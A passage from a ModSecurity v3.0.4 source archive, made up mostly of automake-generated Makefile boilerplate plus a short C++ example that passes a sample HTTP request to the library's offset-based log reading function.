$(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .cc.lo: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCXX_TRUE@ $(LTCXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(LTCXXCOMPILE) -c -o $@ $< read-read.o: read.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(read_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT read-read.o -MD -MP -MF $(DEPDIR)/read-read.Tpo -c -o read-read.o `test -f 'read.cc' || echo '$(srcdir)/'`read.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/read-read.Tpo $(DEPDIR)/read-read.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='read.cc' object='read-read.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(read_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o read-read.o `test -f 'read.cc' || echo '$(srcdir)/'`read.cc read-read.obj: read.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(read_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT read-read.obj -MD -MP -MF $(DEPDIR)/read-read.Tpo -c -o read-read.obj `if test -f 'read.cc'; then $(CYGPATH_W) 'read.cc'; else $(CYGPATH_W) '$(srcdir)/read.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/read-read.Tpo $(DEPDIR)/read-read.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='read.cc' object='read-read.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(read_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o read-read.obj `if test -f 'read.cc'; then $(CYGPATH_W) 'read.cc'; else $(CYGPATH_W) '$(srcdir)/read.cc'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool clean-noinstPROGRAMS \ mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/read-read.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/read-read.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/reading_logs_with_offset/read.cc0000644000175000017500000000142013607066010024577 0ustar zimmerlezimmerle #include #include #include // Variable offset - REQUEST_HEADERS_NAMES const char *request = "" \ "GET /index.html?param1=value1¶m2=value1¶m3=value1 HTTP/\n" \ "AuThOrIzAtIoN: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n" \ "Host: localhost\n" \ "Content-Length: 27\n" \ "Content-Type: application/x-www-form-urlencoded\n"; int main() { modsecurity::ModSecurity msc; std::string json(""); const char *err = NULL; int ret = 0; ret = msc.processContentOffset(request, strlen(request), "o0,4v64,13v114,4v130,14v149,12t:lowercase", &json, &err); if (ret >= 0) { std::cout << json << std::endl; } else { std::cout << err << std::endl; } return ret; } modsecurity-v3.0.4/examples/reading_logs_with_offset/Makefile.am0000644000175000017500000000141613607066010025416 0ustar zimmerlezimmerle noinst_PROGRAMS = read read_SOURCES = \ read.cc read_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) read_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(YAJL_LDFLAGS) read_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/examples/reading_logs_via_rule_message/0000755000175000017500000000000013607066346024365 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/reading_logs_via_rule_message/Makefile.in0000644000175000017500000006213213607066346026436 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ noinst_PROGRAMS = simple_request$(EXEEXT) subdir = examples/reading_logs_via_rule_message ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = PROGRAMS = $(noinst_PROGRAMS) am_simple_request_OBJECTS = simple_request-simple_request.$(OBJEXT) simple_request_OBJECTS = $(am_simple_request_OBJECTS) am__DEPENDENCIES_1 = simple_request_DEPENDENCIES = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = simple_request_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX \ $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=link $(CXXLD) \ $(AM_CXXFLAGS) $(CXXFLAGS) $(simple_request_LDFLAGS) \ $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/simple_request-simple_request.Po am__mv = mv -f CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) LTCXXCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CXX) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CXXFLAGS) $(CXXFLAGS) AM_V_CXX = $(am__v_CXX_@AM_V@) am__v_CXX_ = $(am__v_CXX_@AM_DEFAULT_V@) am__v_CXX_0 = @echo " CXX " $@; am__v_CXX_1 = CXXLD = $(CXX) CXXLINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CXXLD = $(am__v_CXXLD_@AM_V@) am__v_CXXLD_ = $(am__v_CXXLD_@AM_DEFAULT_V@) am__v_CXXLD_0 = @echo " CXXLD " $@; am__v_CXXLD_1 = SOURCES = $(simple_request_SOURCES) DIST_SOURCES = $(simple_request_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ simple_request_SOURCES = \ simple_request.cc simple_request_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(MAXMIND_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ 